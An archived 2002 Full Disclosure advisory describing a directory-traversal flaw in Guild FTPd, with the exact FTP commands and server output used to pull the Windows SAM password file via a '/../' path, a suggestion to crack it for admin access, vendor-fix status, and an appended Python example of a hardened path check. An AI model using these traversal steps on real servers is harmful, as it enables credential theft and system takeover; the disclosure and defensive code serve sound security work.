Full Disclosure mailing list archives
Guild FTPd Exploit
From: full-disclosure () mike-c com (Mike C)
Date: Mon, 9 Sep 2002 02:54:21 +0100
______________________________________________________________________
Product Information

Guild FTPd 0.999.5
Released 4th July 2002
http://www.nitrolic.com

Guild FTPd is an ftp server which is growing ever more popular due to its link with IRC. It can detect if the people on your FTP are in the same channels you are, and kick/ban them accordingly. This is useful if you wish to keep your ftp data a little more private.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

____________________________________________________________
Exploit Information

Author: Mike C
Date: 7th September 2002
Description: Using a simple exploit in Guild FTPd, we can download any file on the same hard drive as the ftp root folder.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

__________________________________________________
SAM SECURITY FILE

LOCAL PATH    = C:\windows\repair\sam
FTP ROOT      = C:\ftp
RELATIVE PATH = ../windows/repair/sam
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1) We try to download the sam file using a relative path to the ftp root

ftp> GET "../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576 bytes).
425 Download failed.
ftp>

2) We get a 'Download failed' message, along with a filesize, confirming the file exists. If the file doesn't exist, we get 'Access denied: File not found.'

3) Adding a / to the start of the relative path seems to bypass the server's security relating to relative URLs. Note however, that / doesn't escape the ftp root as you may expect. Where '../foo.bar' is not accessible, '/../foo.bar' is.

ftp> GET "/../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576 bytes).
226 Transfer complete. 24576 bytes in 1 sec. (24.58 Kb/s).
ftp: 24576 bytes received in 2.08Seconds 11.80Kbytes/sec.
ftp>

4) We have just successfully exploited the server, managing to download the system's sam file. An application such as l0phtcrack (http://www.atstake.com/research/lc/) could now be used to find the passwords, thus giving full administrative access to the exploited system.

______________________________________________________________________
Vendor Status:

The authors of Guild FTPd were notified on 7th September 2002. The exploit has been fixed as of 8th September 2002. A new version will be released on 15th September 2002.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
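The bypass in step 3 is the classic symptom of a path check that looks at the literal string the client sent ("does it start with ../?") instead of resolving the path first. The following Python is an added example written for this archive page, not Guild FTPd's code and not the author's: naive_is_allowed() is an assumption modelling the behaviour the post describes (reject a leading '../', accept a leading '/'), and confine_to_root() is the kind of segment-by-segment resolution a server should do instead, mapping the request onto a virtual root and refusing any attempt to climb above it. FTP_ROOT and the sample paths are constructed from the advisory's own values.

```python
import posixpath
from typing import Optional

# Constructed example: the advisory's FTP root, written with forward slashes
# so the same normalisation logic works for FTP paths on any host OS.
FTP_ROOT = "C:/ftp"


def naive_is_allowed(requested: str) -> bool:
    """Weak check modelled on the behaviour the advisory describes
    (an assumption about the server's logic, not its source code):
    reject requests that begin with '../' and accept everything else,
    which is exactly what lets '/../...' through."""
    return not requested.startswith("../")


def confine_to_root(root: str, requested: str) -> Optional[str]:
    """Map a client-supplied FTP path onto a filesystem path under root.

    The path is walked segment by segment; '..' pops one segment and is
    refused when there is nothing left to pop, so any attempt to climb
    above the root is rejected however it is spelled ('../x', '/../x',
    'a/../../x', '..\\x'). Returns the resolved path, or None if the
    request escapes the root or carries a drive-qualified component.
    """
    segments = requested.replace("\\", "/").split("/")
    stack = []
    for seg in segments:
        if seg in ("", "."):
            continue                 # empty (leading or double slash) or current dir
        if seg == "..":
            if not stack:
                return None          # would climb above the FTP root: refuse
            stack.pop()
            continue
        if ":" in seg:
            return None              # 'C:'-style drive prefix has no place in an FTP path
        stack.append(seg)
    return posixpath.join(root, *stack) if stack else root


def classify(requested: str) -> str:
    """Short verdict comparing the weak and the hardened check; the
    'bypass-of-weak-check' case is what a server-side audit log should flag."""
    weak = naive_is_allowed(requested)
    hardened = confine_to_root(FTP_ROOT, requested)
    if hardened is None:
        return "bypass-of-weak-check" if weak else "rejected"
    return "allowed:" + hardened


if __name__ == "__main__":
    for p in ["../windows/repair/sam", "/../windows/repair/sam",
              "pub/../incoming/file.txt", "..\\windows\\repair\\sam"]:
        print(f"{p!r:32} -> {classify(p)}")
```

Note that the hardened check never consults the disk: a request is refused purely because its resolved form would leave the root, which is also why a '425 Download failed' versus 'File not found' difference (the file-existence oracle in step 2) cannot arise from it.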